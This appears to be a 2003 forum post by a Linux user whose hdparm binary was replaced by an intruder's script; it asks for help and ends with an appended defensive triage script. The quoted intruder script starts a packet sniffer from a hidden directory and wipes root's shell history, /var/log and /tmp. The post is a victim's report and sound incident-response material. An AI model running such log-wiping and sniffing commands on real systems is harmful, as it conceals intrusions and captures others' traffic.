My pc hacked?
2003-04-19 - By A. Johnson Jeba Asir

Hello all,
My RedHat Linux 6.2 PC's hdparm file was replaced with the following contents:

#!/bin/sh
cd /usr/share/.pht
/usr/sbin/xinetd stop
./panel -f ./s
./linsniffer >> ./tcp.log &
cd /
rm -rf /root/.bash_history
rm -rf /var/log/*
rm -rf /tmp/*
cd /

All the above listed commands seem to have been executed.
Also a new file named xinetd is available. The details are appended below.
I had Ipchains rules allowing restricted access.
Now, is my PC hacked? If so, please give details on how it may have been done. How do I prevent this from happening again?
Please reply
Thanking you, Johnson. A

xinetd file content
--------------------------------------------------
#!/bin/bash

# Init file for OpenSSH server daemon
#
# chkconfig: 2345 55 25
# description: OpenSSH server daemon
#
# processname: sshd
# config: /etc/ssh/ssh_host_key
# config: /etc/ssh/ssh_host_key.pub
# config: /etc/ssh/ssh_random_seed
# config: /etc/ssh/sshd_config
# pidfile: /var/run/sshd.pid

# source function library
. /etc/rc.d/init.d/functions

RETVAL=0

function start()
{
	if [ ! -f /etc/ssh/ssh_host_key -o ! -s /etc/ssh/ssh_host_key ]; then
		/usr/bin/ssh-keygen -b 1024 -f /etc/ssh/ssh_host_key -N ''
	fi
	if [ ! -f /etc/ssh/ssh_host_dsa_key -o ! -s /etc/ssh/ssh_host_dsa_key ]; then
		/usr/bin/ssh-keygen -d -f /etc/ssh/ssh_host_dsa_key -N ''
	fi

	echo -n "Starting sshd:"
	daemon /usr/sbin/sshd
	RETVAL=$?
	echo
	[ "$RETVAL" = 0 ] && touch /var/lock/subsys/sshd
}

function stop()
{
	echo -n "Stopping sshd:"
	killproc /usr/sbin/sshd
	RETVAL=$?
	echo
	[ "$RETVAL" = 0 ] && rm -f /var/lock/subsys/sshd
}

case "$1" in
	start)
		start
		;;
	stop)
		stop
		;;
	restart)
		stop
		start
		;;
	condrestart)
		if [ -f /var/lock/subsys/sshd ] ; then
			stop
			start
		fi
		;;
	status)
		status /usr/sbin/sshd
		;;
	*)
		echo "Usage: sshd {start|stop|restart|condrestart|status}"
		RETVAL=1
esac
exit $RETVAL
--------------------------------------------------
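
The two oddities visible in this post (hdparm replaced by a shell script, and a file named xinetd whose header declares "processname: sshd") can be checked for mechanically. The shell example below is added here and is not part of the original post; the function names and the sample files are constructed for illustration, and real paths can be passed as arguments.

```shell
#!/bin/sh
# Added triage example (not from the original post). It flags a file that is
# a shell script where a binary is expected, and an init-style script whose
# "# processname:" header names a different daemon than the file name.

# Succeeds if FILE starts with "#!" (a script) instead of the ELF magic.
# Only meaningful for paths that should hold binaries, such as hdparm.
is_script() {
    [ "$(head -c 2 "$1" 2>/dev/null)" = '#!' ]
}

# Prints the daemon named in the first "# processname:" header line, if any.
declared_processname() {
    sed -n 's/^#[[:space:]]*processname:[[:space:]]*\([^[:space:]]*\).*/\1/p' "$1" 2>/dev/null | head -n 1
}

# Succeeds if FILE declares a processname that differs from its own name.
name_mismatch() {
    declared=$(declared_processname "$1")
    [ -n "$declared" ] && [ "$declared" != "$(basename "$1")" ]
}

# Prints one finding per line for FILE; prints nothing if neither check hits.
triage() {
    if is_script "$1"; then echo "SCRIPT $1"; fi
    if name_mismatch "$1"; then echo "MISMATCH $1 declares $(declared_processname "$1")"; fi
}

# Constructed samples standing in for the files described in the post.
make_samples() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\ncd /usr/share/.pht\n' > "$dir/hdparm"
    printf '#!/bin/bash\n# processname: sshd\n' > "$dir/xinetd"
    printf '\177ELF\002\001\001' > "$dir/ls"
    echo "$dir"
}

# With arguments, triage those paths; with none, use the constructed samples.
if [ "$#" -gt 0 ]; then
    for f in "$@"; do triage "$f"; done
else
    d=$(make_samples)
    for f in "$d/hdparm" "$d/xinetd" "$d/ls"; do triage "$f"; done
    rm -rf "$d"
fi
```

On a machine suspected of compromise, run checks like these from trusted media, since the installed utilities may themselves have been replaced.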